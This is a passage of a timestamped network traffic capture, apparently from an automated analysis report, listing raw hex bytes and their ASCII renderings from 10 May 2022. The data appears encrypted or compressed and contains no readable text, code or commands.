3b 60 c4 ca 5f 8d 49 83 99 d1 5c 3f 17 37 2e 20 a6 49 c0 a8 4a 82 8b 91 2d d1 10 da fd a2 db 5e 9f 3a 1f c4 01 bd 96 ff 78 07 64 52 5a d9 af 4f 6e c4 09 1f f5 5e 7b 8a ac e9 e4 40 9b 74 1b 18 2d c5
                                                                                    Data Ascii: ]2rs9~N{"lTO/&V-}n%A@<gdJcOm8=RHG<+sE(sv^qtV_*`%31cUec>D+b>z;n3xjs;`_I\?7. IJ-^:xdRZOn^{@t-
                                                                                    2022-05-10 20:11:05 UTC65INData Raw: e0 08 f4 39 de 03 35 71 12 00 59 da 88 d0 bd 37 f7 a7 8f 4a 2d 61 29 e1 5f 64 61 db e9 58 f3 57 a2 7d 83 9f 8b d2 58 3b 6c 08 c9 91 3d 53 07 f5 43 fc 78 30 00 a5 08 0d b4 9f 0f 28 48 ec 6a 03 75 93 c4 5d 91 20 0f b8 61 39 45 37 01 c8 49 1e cc 1c 88 3d 1b ac a7 21 e2 40 42 98 d0 23 4c 69 51 2b fd c0 70 13 c5 6c 25 d2 ae cf fb 5b c7 88 bd c5 50 7d 84 00 e8 b9 05 45 90 bd 0c 71 a7 a7 81 31 94 96 70 0e e6 ee 2a fa 9a be ae 3e a2 17 ae 4e 72 9f c7 1b 70 d8 1e df 93 89 5f 88 62 98 a2 aa 1e ab df 03 3f 2e b6 7f 60 80 fe 4d 7e 18 d1 82 75 e1 a6 b8 75 1d ad 55 61 e2 83 dc 5f d9 e9 09 bc c5 89 58 93 01 46 2f 09 47 0b da bd dc 61 14 f4 fb 06 7f c3 46 3b cf b1 2f bc 46 5d 20 01 7a 47 10 65 fa 2e f9 96 29 7a 9c a2 4f f4 3c 07 2c 02 e4 bc f8 b9 89 12 e3 25 0f 30 15 1b
                                                                                    Data Ascii: 95qY7J-a)_daXW}X;l=SCx0(Hju] a9E7I=!@B#LiQ+pl%[P}Eq1p*>Nrp_b?.`M~uuUa_XF/GaF;/F] zGe.)zO<,%0
                                                                                    2022-05-10 20:11:05 UTC65INData Raw: 9f f2 fd 1e 44 cd 45 9d 5b a6 42 7b 3a 7f c7 0f 1a d2 68 c3 ba d6 43 49 c1 9a d2 5a 76 07 9c d6 f9 7e e2 88 be b7 6e d9 b5 c4 65 ea 88 59 83 ef 10 a3 60 75 ba ea 02 5a d9 d5 9b 6f 31 e0 16 83 46 c5 45 94 02 59 e7 c0 e3 49 cf 77 4b 43 64 4c ca a9 7c 8c 22 3f 7e 03 b4 2e f9 38 11 b4 ab 58 c6 b2 21 44 27 0a 32 be 1f f4 ca d7 91 62 17 3e 46 af f8 22 1f 8d 6b c0 0c 8d f8 32 ca 9d 4e b9 8b 28 9e b1 cf e7 55 a1 ed 30 52 8e 10 c2 04 ae 39 d4 21 32 9c 13 0a 7f ee 40 cd 95 86 df 83 85 25 06 0f 01 e9 77 0a 74 cc f8 a6 c4 40 b3 79 bc 9f 8d d2 52 36 76 a0 6f bf a5 f5 c6 6e 53 f7 0b 8b a2 b4 24 12 41 5a 09 28 42 fa c4 38 42 1d 73 8a 90 d2 ad 6e ec 26 69 18 11 d5 5a 9a 45 ab 9e 0d 23 99 bf 8c 43 46 8f 07 f1 30 46 43 ea 2b da c5 52 b6 d4 66 b5 e5 b8 47 c4 5d ef ad ab ed
                                                                                    Data Ascii: DE[B{:hCIZv~neY`uZo1FEYIwKCdL|"?~.8X!D'2b>F"k2N(U0R9!2@%wt@yR6vonS$AZ(B8Bsn&iZE#CF0FC+RfG]
                                                                                    2022-05-10 20:11:05 UTC67INData Raw: 3a e5 3a 0d 12 9b 92 9d 14 35 e3 5e 92 2b e5 70 1f 99 bc 3b 47 68 e0 26 a1 1f 00 7b da d1 a9 9d 90 ae 2c 3e 8d 3f 3f 96 b2 ca df fe 0e 30 88 4a ad f1 6f 5f 70 1b 20 11 77 28 e5 d3 bb 80 cd 19 8f 3a d3 b9 00 20 b4 ec 13 60 ed e7 6c 34 55 15 2d e2 67 25 4f 99 51 83 fd 18 ba 71 1e 81 60 02 9c 3f af 73 50 c4 4c 95 24 39 05 f0 95 65 c9 80 bc 0e 72 33 e4 f2 e0 0d c2 88 6f 60 d9 fe 2e ac 1a b9 c2 7b 20 14 e7 9c 81 52 0e cd 73 59 25 df 4a 7f 6a da b0 42 2e b0 7d 8a 36 b3 7e e3 99 06 79 88 99 37 90 1d b1 c6 e5 06 03 4b 6c 13 3c 8d 73 9c 90 37 7b fb 13 2a 21 c9 f2 e6 8a 17 58 97 82 b6 44 80 8d 18 eb a7 e6 d2 cb 6a cc 64 b2 e6 93 14 7b 1d 63 45 93 71 3d 43 9a b3 2e 55 e6 c0 57 84 a3 2b d9 12 c5 7d 1d 7c fa 3d 89 e1 c3 b1 07 d8 ad ed 89 26 55 3a 66 a2 aa 6d 98 e4 52
                                                                                    Data Ascii: ::5^+p;Gh&{,>??0Jo_p w(: `l4U-g%OQq`?sPL$9er3o`.{ RsY%JjB.}6~y7Kl<s7{*!XDjd{cEq=C.UW+}|=&U:fmR
                                                                                    2022-05-10 20:11:05 UTC68INData Raw: 7f c3 8b 85 e9 6b 4d 07 e9 4e 9e d6 46 77 55 76 07 97 d6 fe 66 fc a8 da 3d d9 f7 f9 d9 64 e0 fc 13 a2 fe 1b 9d 1f 79 b3 62 da 38 bf d5 91 47 bd 7c 2f 88 48 ed 20 92 14 4e 80 d5 6c fe bb 29 8f 43 60 c2 6c 69 61 0b 43 04 73 13 a0 32 db 6f 11 aa dc ab d4 a5 00 1e 32 69 08 98 0e d9 c8 f9 ef 4c 02 51 6c bf f6 3f 83 83 7c af 20 9f da 29 f7 93 d2 85 07 17 9f a2 c4 5b c9 a8 f9 18 ff 9d 15 c1 3d fe 30 5a 9c 32 52 13 0a 7f d7 93 da 84 86 fe 29 32 3b 24 7a 28 eb 7d 1d 61 c5 fe 75 c1 49 8a 6d aa 12 80 c3 5b 26 6f e9 54 98 b3 ee c0 eb 7d f2 64 a1 01 a5 08 17 60 99 27 29 48 ef ef b3 7e 0b 70 05 31 95 37 6f ec 26 56 30 28 cd 4c 17 48 ba 99 63 2b bb ae a5 59 5f 92 55 db 15 6e 75 48 3a f3 c2 71 32 fa 64 bf fc cd e3 c3 5d ef a6 63 c5 5c f5 95 0a be 73 16 4f 81 b7 1d 6f 96
                                                                                    Data Ascii: kMNFwUvf=dyb8G|/H Nl)C`liaCs2o2iLQl?| )[=0Z2R)2;$z(}auIm[&oT}d`')H~p17o&V0(LHc+Y_UnuH:q2d]c\sOo
                                                                                    2022-05-10 20:11:05 UTC69INData Raw: ee f2 65 0a 8b a4 28 e2 b8 39 55 17 21 17 6a d4 ee 8e 11 27 bf fb 3e af 3e 3f 96 47 f2 ff 3a b8 28 5a 55 18 fd b8 d2 45 31 29 3a 64 24 ed c4 ba 8c db 11 01 bd fb ee 7c 20 ac fe 05 71 e0 f4 d2 8b 5d b9 9f ca 7d b1 4f 93 54 fc 56 14 b6 6f 07 fe 97 8d 2b 3d 2d cc 48 7d 41 1b 95 06 a1 e3 43 ee de 17 bf 0f 67 45 0c fa 6e b0 ba 52 7e 71 c0 fb 2d cb 0f bc d5 5e b7 ca ee 8b a4 51 05 dc 78 3d 00 4a 2b eb 14 d7 a5 94 37 b5 44 fa 23 a2 49 29 09 07 f7 39 a6 7a 84 cb 3a 8a 1a 07 02 52 05 05 2f 88 f7 23 a0 92 6c e9 06 0c 88 9f e3 e5 b3 8e cf 86 80 d4 b5 15 57 04 ab bf f5 d4 d0 6c f5 e2 a7 e8 01 1c 00 19 63 43 6d f7 3a 52 92 54 0b ca cd da 29 82 b0 25 c2 1f fc f0 8d 6d f8 04 03 71 19 29 29 4c af fc 81 c1 82 d6 67 a8 cf 45 4d e5 58 cc 02 46 fb c3 77 36 3b 3a 8f 22 d5 e6
                                                                                    Data Ascii: e(9U!j'>>?G:(ZUE1):d$| q]}OTVo+=-H}ACgEnR~q-^Qx=J+7D#I)9z:R/#lWlcCm:RT)%mq))LgEMXFw6;:"
                                                                                    2022-05-10 20:11:05 UTC71INData Raw: d2 e2 76 07 9c aa d0 6d ed a6 c2 a2 67 ce d0 b7 67 e8 82 7e d9 fb 1d 8b 04 1e 92 ee 6d 40 c9 c4 b9 6d 31 cb 01 fd 6d ef 2a 96 04 4e 99 b3 f6 48 c5 44 9e 57 73 9a c8 ab 72 91 e5 39 e7 a5 9f 85 34 96 ff b3 b9 99 03 b6 00 1c 3c 0b 32 a7 50 2d 24 0f f8 6f 15 3e 41 ae f6 35 92 8a 5e c1 c3 9d d8 2f f2 8b 5f af 14 27 98 b1 e2 47 44 83 6f 18 fe 9f 06 db 24 cc 2b d6 2b 1a 71 03 02 6c 38 96 e0 9c 9d f0 b1 9a 32 90 7a 3a e3 77 1d 6d c4 fc 8e d6 7b a8 04 ac 10 8a d8 5e 28 71 95 76 99 a2 ec c9 1c 6d db 00 94 8d 8e 02 06 68 e5 0e 31 5b ed e4 a5 75 02 63 75 87 d6 12 7f ea 3b 93 24 06 c4 5c 04 4a ab 8f 04 2c 44 af 83 5d 46 9f 92 d2 ac 5b 51 40 3a e8 d9 67 e4 d5 4a b6 eb c0 d1 e4 7e 73 b2 ae cd 5a ce 9d 15 e9 91 17 63 8c bf 14 7b f9 4e 8b bf 29 8a 5e 2e e3 f5 21 e2 1c 1e
                                                                                    Data Ascii: vmgg~m@m1m*NHDWsr94<2P-$o>A5^/_'GDo$++ql82z:wm{^(qvmh1[ucu;$\J,D]F[Q@:gJ~sZc{N)^.!
                                                                                    2022-05-10 20:11:05 UTC72INData Raw: 3f d1 de c6 aa 3b b1 bd f6 10 bf 80 3f 9c 93 f5 c8 6a 91 93 50 5d 7d ce 2e d6 4f 1d 08 ae 64 24 e7 c9 a2 a4 f4 11 01 87 c2 04 00 20 be e3 2d 40 e1 ef e8 ae 5a 9d 97 17 e7 25 4f 93 42 fc 61 15 b6 63 1e 89 78 88 03 63 25 c4 66 6f c2 1a 93 28 f2 e0 45 e5 2b fd bd 0f 61 20 e2 ff 01 32 d4 52 7a 66 10 e0 0a a7 0e 84 9f 77 37 ce ff 89 9d c3 10 b3 f7 4f ff 4d 38 e7 53 9d a6 94 37 ac 68 96 22 b5 20 88 89 03 f1 50 16 ed 87 c1 2f fe ed 2e 1c 5b 6a 03 3c 8e d5 0c 88 ed 62 c1 2f 24 0a 91 da 1f 9b 19 cc 97 81 8f 4d 14 57 25 d7 b7 e6 dc e3 88 dd 61 a3 f9 0f 20 ac 85 67 45 43 76 b4 55 94 27 f5 df d9 c4 6e 21 b2 25 c2 03 fc a9 8a 6d f8 3a 0a 72 19 2f 00 dd bf e8 af 11 7d d7 6d 8a 3c 45 4f ef 43 c0 02 ce fe c3 77 0d b6 2f 87 30 d5 f9 c3 8a 92 7f 99 53 13 b1 77 64 b2 39 7e
                                                                                    Data Ascii: ?;?jP]}.Od$ -@Z%OBacxc%fo(E+a 2Rzfw7OM8S7h" P/.[j<b/$MW%a gECvU'n!%m:r/}m<EOCw/0Swd9~
                                                                                    2022-05-10 20:11:05 UTC73INData Raw: df da 44 75 e4 9d 7f bd c9 83 9a 00 6e b6 cc f8 46 d8 d5 0d 52 3d d4 0a b2 98 ed 2a 90 9e 4e 86 c3 ec 69 0a 4e 8f 43 f8 5d d5 a0 6c 9a c2 b0 78 1c bf 28 d5 18 9c b3 bd 91 c4 85 d4 0d 36 1a bd 88 00 cc c9 ef 80 d9 04 30 5f ad e9 6e 0e 9b 65 df 19 81 b8 bf f9 85 40 bb 18 2f 02 a0 c0 5a 52 a3 2c 18 fe 8e 8c d9 22 eb 2e f4 d0 1a 71 12 96 64 c8 88 d4 b5 57 f7 a7 85 b9 1d 6e 36 f2 68 68 f9 ca e1 6f cd 77 04 77 ab 12 16 c3 5c 28 7e 99 35 05 a2 ea ce fe 4c 24 0b 8a 00 39 13 08 76 eb 16 72 d4 f4 ea ab 63 06 ef 9a 88 e5 07 71 bf b0 54 39 0d c4 5d 9a 69 ab 9e 0d 23 b4 bf a1 43 77 00 8b ce 30 da 53 46 2d e6 de e6 0b da 7e a0 92 5b da f5 44 cf 62 bd c5 5a 43 84 04 e5 70 61 d3 90 b9 06 70 d5 da 98 b1 3f 9f 0d a5 e1 f3 3c ec 53 95 ae 34 32 80 40 94 61 80 48 06 55 d8 06
                                                                                    Data Ascii: DunFR=*NiNC]lx(60_ne@/ZR,".qdWn6hhoww\(~5L$9vrcqT9]i#Cw0SF-~[DbZCpap?<S42@aHU
                                                                                    2022-05-10 20:11:05 UTC74INData Raw: 9c 90 e9 29 71 95 2a 48 50 77 ef a2 2c 4e 37 05 16 72 0c f5 c4 aa 86 cc cb 16 5b 76 88 01 20 bf ef 07 76 f7 e8 6c 34 32 c0 9a ca 77 23 c1 24 6b be f8 3e aa 68 0d 84 70 72 2a 1b 33 c6 66 16 43 95 24 41 84 e7 43 e2 f0 0e 0b 21 a5 2c fe fb 67 ac 2b 53 50 73 dd fe 05 bd 17 42 d2 5a 35 e5 ec a6 0f c1 2c dc 7e 55 cf 42 2b 10 7a d7 a7 34 3d bd 7d f4 9d a2 4f 0b 83 1c eb 17 35 ed 87 c1 36 ff cd a7 06 58 6c 2d 93 88 fd 21 fb f4 6a e9 0a 29 03 f4 f9 e1 9b 13 e1 8a ae 05 4e 14 51 26 df bd f7 de dd 4e d4 49 00 ec 07 32 eb 01 61 45 4f 73 35 44 87 2c cc 57 cc d0 46 93 be 34 c3 8d c7 77 98 69 91 31 85 75 13 3c 0f df b8 f1 bf c1 7c d7 67 b3 ae 54 42 7f 41 c2 3b c6 90 4c 70 1e b5 16 2b 20 fd 67 ef 34 94 69 1e 47 16 a0 73 58 97 2d 56 89 a3 c3 9f c8 e1 b2 a9 2d 18 83 db 74
                                                                                    Data Ascii: )q*HPw,N7r[v vl42w#$k>hpr*3fC$AC!,g+SPsBZ5,~UB+z4=}O56Xl-!j)NQ&NI2aEOs5D,WF4wi1u<|gTBA;Lp+ g4iGsX-V-t
                                                                                    2022-05-10 20:11:05 UTC76INData Raw: be ec 43 46 d8 d5 b1 43 33 da 2f 05 49 ed 20 92 2a 36 89 dc e8 5d d2 66 1a 42 64 46 b4 a4 62 85 fe 26 b7 00 88 0f ca 69 0a 8a 9d 8c d5 a3 00 25 0e 1a 21 93 d0 d3 dd da fe 45 14 2e 40 be f6 35 92 8a 71 da 0d 8c c0 23 e8 8a 44 9e 03 17 bd b1 ce 45 64 83 f9 09 d6 19 10 c8 26 f6 2d c2 03 8f 70 12 00 1a dd 96 cc 9f 86 29 ab ad 12 0c 60 23 c3 4f 0c 65 d1 31 70 d1 7d a2 76 bb 12 8a d2 52 37 65 93 6b 99 bf fe d1 e2 6d e9 09 a2 1f a7 02 0c 43 e5 39 2b 48 4e e6 b4 7d be 73 8b 97 ec 15 56 71 2e 45 37 00 d2 52 1a bc aa b2 19 34 92 96 aa 55 51 8e a3 e0 30 46 48 5e 7a 0e d1 7a 1a cb 68 b2 fa ce d4 ea a3 ee 80 b3 15 78 df 95 08 d7 7b 16 4f 8b bb 02 7d 9b 46 80 a1 dd 81 6d 2c f7 d5 17 f6 14 0f a9 12 02 a0 b9 9e 77 c0 1b 16 5b c7 10 d2 8f 85 5e 86 71 fc 8b ec 12 93 9f 29
                                                                                    Data Ascii: CFC3/I *6]fBdFb&i%!E.@5q#DEd&-p)`#Oe1p}vR7ekmC9+HN}sVq.E7R4UQ0FH^zzhx{O}Fm,w[^q)
                                                                                    2022-05-10 20:11:05 UTC77INData Raw: 4f 1b 33 20 66 24 c5 c5 aa 8c d3 11 01 9c ed a8 2a 3b be e3 12 8f e0 c3 e0 9b 56 9b 9d dc 83 25 63 91 52 84 ec 13 ae 9b 0c a1 6b a7 29 1c c2 c6 1b 68 45 1b 97 04 fd e5 40 95 9e 80 bc 0b 4b 36 f3 fb 7d 8a d7 52 54 71 ca f3 03 b4 0b ad c5 7d 1c d5 ee 8a 9b 38 07 f0 7c 56 f4 4b 2c f7 85 d6 8b 96 2a b6 6c 80 3f 5c 4e 2d 8a 28 f5 14 6d ef fc a2 3c f9 e1 2c 20 5a 69 78 44 88 fd 2f a2 ed 68 e9 13 14 08 9b cb e3 9b 19 ca 86 86 b6 5c 1f 7c 15 c4 b8 e0 2a db 48 df 79 a8 e8 00 22 7a 1c 4f 47 52 6b 39 55 8c d9 f5 e7 cf fb 44 a9 51 27 b3 7d d4 73 8d 47 dc 2e 84 08 73 2f 01 cd 81 fc 87 b2 6e e7 65 a2 88 45 4f e5 54 c4 2a d1 e9 c8 5a 05 bf 39 98 da fc 4d c5 92 9f 69 13 42 ed b0 5a 72 b1 26 56 84 82 7a 9f e4 e3 ea 71 07 fb 8b b3 18 04 8a 50 92 4d 15 03 a7 5d 0b 0e 76 2b
                                                                                    Data Ascii: O3 f$*;V%cRk)hE@K6}RTq}8|VK,*l?\N-(m<, ZixD/h\|*Hy"zOGRk9UDQ'}sG.s/neEOT*Z9MiBZr&VzqPM]v+
                                                                                    2022-05-10 20:11:05 UTC78INData Raw: ed 2a 83 32 5d 88 f4 e2 49 c5 df 8f 43 75 5a d0 94 78 85 f3 3b 97 13 8c 3a d2 62 00 a5 a5 70 d4 89 08 1a 3d 1a 26 81 f0 d2 f7 f2 d5 47 3e dd 42 c5 8c 35 92 8e 41 f6 0f 9d f2 32 e8 8b 55 d3 7d 17 9e b5 e4 45 44 90 c9 1b fe fd 10 c8 2c f4 39 d4 2b 18 59 05 0a 75 cc 94 e1 9e a4 c9 a2 85 23 7f 49 2b eb 7d 76 67 a8 be 71 d7 51 cd 34 aa 12 8c d0 51 1f 27 83 7e 9f dc cf d3 e2 66 98 30 8b 00 a3 00 69 2b f7 09 2e 4b cd db b1 7d 1b 1c a0 84 fa 12 01 bf 2d 45 31 02 b4 0f 16 42 ad 9d 24 70 bf ae a9 3a 7c 9a 8b c4 5f 13 43 48 3c fb be 38 1b d4 60 bc d2 86 ce fb 5b 80 87 bf c5 50 b0 c2 0b ff 69 3c 51 92 87 1f 6f be 46 89 bf 2b 80 41 28 e6 f6 0a e8 14 0e a8 c4 2d 8c bb 8c 6a 80 d3 01 a5 c6 23 d9 95 8e 57 9e 71 fc 8b ec 18 80 db 00 f8 2c cd 0e c2 91 f1 70 8a 09 d9 ee 02
                                                                                    Data Ascii: *2]ICuZx;:bp=&G>B5A2U}ED,9+Yu#I+}vgqQ4Q'~f0i+.K}-E1B$p:|_CH<8`[Pi<QoF+A(-j#Wq,p
                                                                                    2022-05-10 20:11:05 UTC79INData Raw: 92 b3 3f 07 3d a1 da 99 77 ff f0 aa 1f 5b 84 93 d5 00 b8 49 8c 4f 90 d2 88 b0 7a 06 92 63 10 2d 28 2d db 02 9c 43 04 9e 33 43 e1 5c e6 d6 5d bc 0f 61 aa f5 e4 61 a5 f3 ce 7a 6e da d3 e3 b4 0b bc 4f 70 28 df f1 ea 10 c0 19 ce 5e cf ff 4b 2b 7d 7d c8 b4 8d a1 bb 73 93 07 45 4f 01 88 9f f1 20 9b cd 35 cb 3c f9 79 00 1d 4e 75 16 b1 8e e2 3c a8 48 68 e9 00 b8 0c 84 fb c3 2b 19 cc 86 1a a1 55 0d 48 77 58 b9 e8 ce fa 8a dd 61 a3 74 01 2b 9f 02 2c d9 43 7f 25 4d 9b bb f2 d4 d0 cf 07 1e b4 3a d6 08 c1 ef 8f 72 e1 0c 6a 75 19 2f 9d cf b4 dc 98 c9 e1 d1 78 83 bf 51 d3 e3 4d e6 0a 4c ff c3 71 82 b9 21 ac 04 18 61 c7 8a 08 6f 0b 70 0c fa ea 76 b9 08 49 c5 06 82 81 ee fe cc ef 2a 07 ae e8 b2 04 8a 54 24 69 08 28 fa b8 0b 0e 72 9d f7 d1 db fc f7 83 cf dc 26 90 4b ff e5
                                                                                    Data Ascii: ?=w[IOzc-(-C3C\]aaznOp(^K+}}sEO 5<yNu<Hh+UHwXat+,C%M:rju/xQMLq!aopvI*T$i(r&K
                                                                                    2022-05-10 20:11:05 UTC81INData Raw: 7b 5d c8 b4 63 94 ff 33 66 ec a1 14 c6 60 11 a5 dc 9a d4 a5 00 12 26 09 2a 99 1f d8 c6 0e ff 69 13 38 53 b7 e8 26 99 8a 7a cb 13 60 db 0f d2 99 56 bf 01 3f ee b0 ce 43 55 8a 8d 39 fe 8e 0b c2 38 dc b8 d6 2b 1c 67 9f 0d 75 c6 96 d8 81 98 df 04 85 25 06 77 a5 d4 77 0c 64 f3 58 70 d7 5d 8a 2d ab 12 80 d9 4d 3e 76 8d 7e 88 b8 fb db 1c 6d db 02 b2 90 5b fd f9 76 fd 1a 23 48 f4 ef ab 71 e3 72 a7 99 eb 1f 68 fd 24 df 1f b6 df 4d 11 6a 1c 9a 0c 36 a1 86 c0 54 57 9e e4 e6 32 46 44 57 37 ea da 7a 0b df 79 b1 04 c6 e7 eb 4c e8 84 07 c1 5a d9 fa 20 fd 6f 10 50 8e a4 16 6f 87 4d 9f 41 22 ac 42 2e e3 f6 21 e2 1f 16 ad c4 2d 8c bb bf 64 b8 f3 e9 a4 38 06 f1 82 96 67 9c 69 4b 8a c0 1a 00 d9 2b 0a 38 ba 5e f3 91 fd 42 56 0a f6 9c 7b 88 d6 ab 79 08 b7 6c eb d2 58 a5 a6 c1
                                                                                    Data Ascii: {]c3f`&*i8S&z`V?CU98+gu%wwdXp]-M>v~m[v#Hqrh$Mj6TW2FDW7zyLZ oPoMA"B.!-d8giK+8^BV{ylX
                                                                                    2022-05-10 20:11:05 UTC81INData Raw: e0 4a 9e 8e 02 f0 d2 e8 35 14 b4 0a 1b 08 4f 83 4b 14 12 6d 03 05 a0 0d 70 18 91 a4 84 ff 89 ef 47 76 75 c3 f1 13 ff 7c 42 a8 9f 45 96 09 0e 7d 9a 97 14 9b e9 a1 0e 4e c2 4d ce 5b a6 48 55 7a 1d c0 d3 12 9c 69 c3 b0 9f b4 b7 c1 90 fa 21 17 0a 8d d6 f2 6f fc a4 c5 4d 6f f3 d9 cf 77 ee 82 65 a6 e5 e1 8a 22 73 91 ee 46 cd d1 ff 91 58 03 c8 07 79 4b ed 2a 3f 02 5f 99 de 9c da c5 4e 85 55 4c 62 db bf 69 93 da 0c 6a 6c 33 38 ca 63 16 8a 9d 8e d5 af 1c 3e 34 31 2e 9d 70 40 db f0 f4 53 3d 10 40 be fc 23 a1 81 43 ee 0f 9e dc 29 35 24 5d ae 07 14 8d b6 bd f9 44 83 f3 13 ef 89 03 d9 3a e7 29 c5 3a 75 b8 12 0a 7f d5 85 e7 8b 9d e6 b6 95 4a e8 61 29 e1 64 07 62 c9 e4 58 ee 55 a2 7d c4 de 8a d2 58 26 75 91 a8 8a a3 f5 c1 f3 7e c5 d7 f9 bc a5 02 0c 64 e0 0e 47 72 e7 e4
                                                                                    Data Ascii: J5OKmpGvu|BE}NM[HUzi!oMowe"sFXyK*?_NULbijl38c>41.p@S=@#C)5$]D:):uJa)dbXU}X&u~dGr
                                                                                    2022-05-10 20:11:05 UTC83INData Raw: 8b 00 c0 7f 08 26 e1 96 92 73 85 b5 5a 33 f4 d1 b9 fd 66 56 ba e9 1e 48 b6 25 f3 2b 70 ce be db 8a 80 7f 02 0a e6 33 bf d9 cf 98 df 43 ff 70 4b 14 f8 a1 e0 ec a5 ac 08 79 f8 4b 99 0a e3 57 88 c6 e0 4d 07 8d ce eb d3 79 e3 40 ae 36 97 6a de c6 ff 33 a7 b9 f6 16 ac 5d 3f 9c 99 f9 fd 6c b4 28 59 47 89 e7 95 cb 4c 18 3e c6 68 2f c6 91 ad 8e a0 d7 01 8d ff 2d b6 37 64 d5 cd 67 cb f4 ef 83 54 82 64 cb 51 20 59 b9 5f 82 ec 1d a1 9b 0c a1 6b 94 26 37 28 dc 9e 01 69 16 90 2c a4 21 43 e8 f2 0e 0b 3e a0 2f fe fb 67 ac 2b 53 50 73 dd fe 05 bd 17 42 d2 5a 35 e5 eb b5 f2 39 f9 23 79 59 29 40 2c e9 4a 7f a4 8a eb 97 6c 87 27 b1 7f 07 88 b3 f6 3f 8e 5e 87 cb 2d ef f6 0f 3a ba 6a 05 2d 88 ec 22 92 13 69 c5 0d 20 09 41 6f dc 9b 19 cd 95 82 bc 59 1d 57 1f cd a1 09 d5 f6 54
                                                                                    Data Ascii: &sZ3fVH%+p3CpKyKWMy@6j3]?l(YGL>h/-7dgTdQ Y_k&7(i,!C>/g+SPsBZ59#yY)@,Jl'?^-:j-"i AoYWT
                                                                                    2022-05-10 20:11:05 UTC84INData Raw: 0c 67 d3 63 2c 1a 02 8b 0e b9 18 09 c9 80 a0 99 1e 9b d0 58 74 73 a3 d9 07 01 77 46 85 9f 43 18 13 1c 46 c4 97 05 95 9c dd 0e 62 df 7e 34 44 b1 5b 5c 60 6e c8 1a 25 c1 68 ef bb e5 19 da c1 90 fb 73 69 1f 85 ca f6 7e e2 b8 2d b2 42 cc d8 a3 a2 ea 82 70 a1 7a 8e 94 03 31 51 e9 6d 46 c1 c6 9e 43 22 c4 1a 6c 48 c1 05 92 00 24 41 dc e2 4d b1 cc 8f 43 65 4e a0 76 63 85 f0 a2 de 15 76 2f 1c e4 2b a2 b3 8c fd e2 08 0d 3c 6e 03 99 0e c8 a6 39 fe 45 11 20 53 b1 f6 24 9d 95 22 3e 0c b2 e1 21 ea 88 4e a4 69 c0 1a ab a1 c1 45 83 ff 6b bf 8c 10 c2 52 bc 3b d4 21 32 38 10 0a 7f c4 ec 0b 95 8c f3 d4 cf 27 0c 6a 01 a0 75 0c 6f f3 a3 72 d7 5d cd f2 aa 12 8c cd 18 24 6a 86 6f 96 ac ed 2f e3 40 e5 09 8d 17 73 8f 2d 69 f6 0b 55 81 e5 e4 b0 62 17 60 84 86 eb 17 71 fc d2 44 1b
                                                                                    Data Ascii: gc,XtswFCFb~4D[\`n%hsi~-Bpz1QmFC"lH$AMCeNvcv/+<n9E S$">!NiEkR;!28'juor]$jo/@s-iUb`qD
                                                                                    2022-05-10 20:11:05 UTC85INData Raw: 25 e3 36 46 d0 48 4b ba c1 8e 0b cf 89 f9 32 1e 97 de db 89 f7 fb 41 08 e2 13 97 9d cd 8b e5 58 90 61 4a 14 fe 60 a1 ee b4 b0 7b 09 87 4b 93 22 aa 5c 93 32 c9 2f 19 8f bf 26 c9 6a e8 47 2e 19 08 66 20 c7 8c 22 25 ba 85 57 95 3e 35 82 f3 8d 95 72 b9 22 78 1e 75 e6 b3 c3 4b 03 f8 63 2e 26 ed cf 82 cf d9 11 0b a5 bf a1 01 2a a6 8b 81 70 e1 e9 e8 9c 50 88 95 ca 6c 2b 50 98 bb 8e c0 1d 8e be f0 72 96 93 27 24 2e c4 71 0f 5f e5 92 02 da f1 4f f3 e5 8f bc 1e 6e 29 e6 05 6f 96 d8 43 74 59 db f3 05 be 18 ba cc 60 24 c1 ee 9c 83 d9 09 22 7f 62 ec 49 2d 65 14 56 a6 94 3b 31 53 87 27 a3 5c 09 97 13 e4 30 8e fc 88 d4 13 07 e4 2a 0b 60 30 fb d2 77 e2 1b 9b e2 68 f8 0f 3b 15 65 e2 cf 92 21 67 7a 79 58 55 34 44 01 c4 ae f8 cb 98 9a dc 4d 90 ea 04 47 c5 1f 63 4f 5c 0a 4a
                                                                                    Data Ascii: %6FHK2AXaJ`{K"\2/&jG.f "%W>5r"xuKc.&*pPl+Pr'$.q_On)oCtY`$"bI-eV;1S'\0*`0wh;e!gzyXU4DMGcO\J
                                                                                    2022-05-10 20:11:05 UTC87INData Raw: 82 a0 97 1e 84 a9 24 36 60 ac cc 39 bc 74 6a 9a 8c 49 84 da 67 24 9c 97 0f b7 b0 5d 0f 68 f1 29 33 5b ac 50 3c e4 7e c7 03 b5 2c 63 dc f6 ed 9b 48 d0 9f e5 5e 88 06 ba e4 ff 7e e4 a9 c2 ba f8 c0 d6 b2 be 86 a1 74 a2 fe 1f 8b 0e 71 fa b7 45 d7 d8 d5 9b fa ac d4 26 81 46 ed 3b 9f 14 a1 89 f0 e1 5e d6 41 8f 52 6b 53 96 41 62 a9 f6 07 6c 2a 35 cb 35 96 2a b9 83 89 d5 d4 0d 0d 36 ac 21 99 1f d1 a0 36 fe 45 11 3d c4 2f e9 38 d2 ce 6d c0 0d 9c d9 50 a9 89 5f a4 1e 7d ed f3 cc 45 4e ab ba 1a fe 84 38 8c 2e f4 33 cc 44 9e 70 12 0c 06 87 95 cc 9f f2 bf a5 85 2f 24 29 2b eb 7d 80 84 db ef 71 db 41 af 75 d0 d9 8a d2 56 1b 20 84 05 52 b3 e4 d5 6c db fa 09 88 7b 6e 02 06 6d 82 8b 28 48 e4 e6 cf b6 1d 73 8f 08 4d 94 51 ec 2c 44 3f 28 ed 4c 17 48 83 c4 0c 30 b0 b9 79 d8
                                                                                    Data Ascii: $6`9tjIg$]h)3[P<~,cH^~tqE&F;^ARkSAbl*55*6!6E=/8mP_}EN8.3Dp/$)+}qAuV Rl{nm(HsMQ,D?(LH0y
